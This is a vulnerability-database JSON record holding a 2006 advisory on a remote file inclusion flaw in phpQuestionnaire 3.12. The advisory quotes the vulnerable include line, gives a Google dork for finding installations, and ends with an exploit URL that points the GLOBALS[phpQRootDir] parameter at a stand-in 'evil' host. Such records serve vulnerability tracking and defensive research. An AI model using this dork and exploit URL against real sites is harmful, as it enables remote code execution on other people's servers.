Description
phpQuestionnaire 3.12 - phpQRootDir Remote File Inclusion
{"lastseen": "2020-04-01T19:06:03", "references": [], "description": "\nphpQuestionnaire 3.12 - phpQRootDir Remote File Inclusion", "edition": 1, "reporter": "Solpot", "exploitpack": {"type": "webapps", "platform": "php"}, "published": "2006-09-21T00:00:00", "title": "phpQuestionnaire 3.12 - phpQRootDir Remote File Inclusion", "type": "exploitpack", "enchantments": {"dependencies": {}, "score": {"value": 0.1, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.1}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2006-09-21T00:00:00", "id": "EXPLOITPACK:63DB184C8D5B88EC2319990B3457AD20", "href": "", "viewCount": 4, "sourceData": "#############################SolpotCrew Community################################\n#\n# phpQuestionnaire 3.12 (GLOBALS[phpQRootDir]) Remote File Inclusion\n#\n# vendor : http://www.chumpsoft.com/products/phpq/\n#\n#################################################################################\n#\n#\n# Bug Found By :Solpot a.k.a (k. Hasibuan) (21-09-2006)\n#\n# contact: chris_hasibuan@yahoo.com\n#\n# Website : http://www.nyubicrew.org/adv/solpot-adv-08.txt\n#\n################################################################################\n#\n#\n# Greetz: choi , h4ntu , Ibnusina , r4dja , No-profile , begu , madkid\n# robby , Matdhule , setiawan , m3lky , NpR , Fungky , barbarosa\n# home_edition2001 , Rendy , cow_1seng , ^^KaBRuTz , bYu , Lappet-homo\n# Blue|spy , cah|gemblung , Slacky , blind_boy , camagenta , XdikaX\n# x-ace , Dalmet , th3sn0wbr4in , iFX , ^YoGa^\n# and all member solpotcrew community\n# especially thx to str0ke @ milw0rm.com\n#\n###############################################################################\nInput passed to the \"GLOBALS[phpQRootDir]\" is not properly verified\nbefore being used to include files. This can be exploited to execute\narbitrary PHP code by including files from local or external resources.\n\ncode from inc/ifunctions.php\n\n################################################################################\n# phpQuestionnaire Version 3.12 #\n# Copyright 2003-2006 chumpsoft, inc. August 7, 2006 #\n# http://www.chumpsoft.com/products/phpq/ support@chumpsoft.com #\n################################################################################\n# Use of this program constitutes your agreement to the terms contained in the #\n# LICENSE file within this distribution. #\n################################################################################\n\ninclude($GLOBALS[\"phpQRootDir\"] . \"inc/tableformat.php\");\n\nfunction ImportSurvey ($fp, $type, $flag) {\n set_time_limit(600); # Attempt to disable time limit in case upgrade takes long\n\n\ngoogle dork : \"phpQuestionnaire v3\"\n\nexploit : http://somehost/path_to_phpQuestionnaire/inc/ifunctions.php?GLOBALS[phpQRootDir]=http://evil\n\n##############################MY LOVE JUST FOR U RIE#########################\n######################################E.O.F##################################\n\n# milw0rm.com [2006-09-21]", "cvss": {"score": 0.0, "vector": "NONE"}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645800126, "score": 1659818015}, "_internal": {"score_hash": "9ca7019ecdaf97aa0dcf5ef628cae0cc"}}